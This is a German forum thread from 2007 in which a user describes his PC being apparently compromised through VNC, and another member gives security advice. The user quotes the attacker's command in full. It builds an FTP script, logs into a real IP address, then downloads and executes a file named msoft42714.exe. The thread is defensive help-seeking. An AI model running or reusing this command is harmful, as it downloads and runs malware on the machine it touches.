habe Sicherheitsproblem !!! |
||
---|---|---|
#0
| ||
04.11.2007, 16:35
...neu hier
Beiträge: 2 |
||
|
||
04.11.2007, 19:00
Member
Beiträge: 3306 |
#2
Hört sich danach an als würde jemand deine Internetverbindung testen und dann irgendwas runterladen. Mit Pech wird dein PC als nächstes oder auch jetzt schon als Spam-Schleuder oder schlimmeres benutzt. Passwortschutz ist gut, aber wenn das Passwort schwach ist und Angreifer Tag und Nacht Zeit haben das auszuprobieren ist das kein sonderlicher Schutz. Zudem ist er natürlich wirkungslos wenn jemand schon auf deinen PC kommt und das einfach auslesen kann.
Ich würde mal damit anfangen VNC nur anzumachen wenn du es auch wirklich brauchst. Irgendwelche Dienste laufen zu lassen ohne das man sie benötigt ist immer ein Sicherheitsrisiko. Sonst würde ich grundsätzlich mit verschlüsselten VPNs oder ähnlichem arbeiten. Gibt ja keinen Grund warum Gott und die Welt 24/7 auf deinen VNC Server zugreifen können muss. Vorher musst du natürlich sicherstellen das dein PC nicht schon voll mit Malware ist. __________ Bitte keine Anfragen per PM, diese werden nicht beantwortet. |
|
|
||
04.11.2007, 22:07
...neu hier
Themenstarter Beiträge: 2 |
#3
Zu Info für jeden der das hier mitbekommt.
Ich gehe davon aus , das mir genau dieses Passiert ist. http://www.tecchannel.de/sicherheit/aktuell/439106/index.html Es gab eine Sicherheitslücke in der Version, die ich installiert hatte. Klasse oder!!!??? Update habe ich sofort gemacht. VPN ist mit Sicherheit die sicherere Lösung. Allerdings habe ich mich damit noch nie richtig befasst.. Habt ihr da ein Tip für mich? Welchen Scanner für Malware könnt ihr empfehlen? Gruß Heiko |
|
|
ich habe meinen Rechner neu aufgesetzt. Habe Antivir als Virenscanner, Spybot für die Registry und eine Firewall (extern). Unter anderem habe ich VNC installiert, damit ich ich von draußen auf mein Rechner kann. Das Ganze natürlich Passwort geschützt. Die Anwendung habe ich auch in der Firewall konfiguriert.
Über Nacht habe ich meinen Rechner laufen lassen. Und siehe da irgendwas hat mein "Ausführen" geöffnet. Das ganze mehrfach mit folgendem Inhalt.
"cmd /c echo open 90.128.78.22 3992 >> i &echo user mmokgp mmokgp >> i &echo get msoft42714.exe >> i &echo quit >> i &ftp -nv -s:i &msoft42714.exe &exit"
Auch in der Ereignisanzeige konnte ich folgende einträge von VNC finden....
"Connections: closed: 90.128.78.22::7896 (read: Connection reset by peer (10054))" oder "Connections: accepted: 90.128.78.22::7896 "
Wer hat da was gemacht??? Fühle mich im Moment sehr ausspioniert !!!!
Hat jemand eine Ahnung Huh?
Eine Sache noch.... Meine eigenen Zugewiesenen ip Adresse meines Providers fangen ähnlich an.... z.B.:90.128.2.97. Kann man das denn nicht einschränken. Zumindest kann man doch sagen ob das alles Nummern des eigenen Providers sind, bzw. der gleiche Provider, oder???
Gruß
Heiko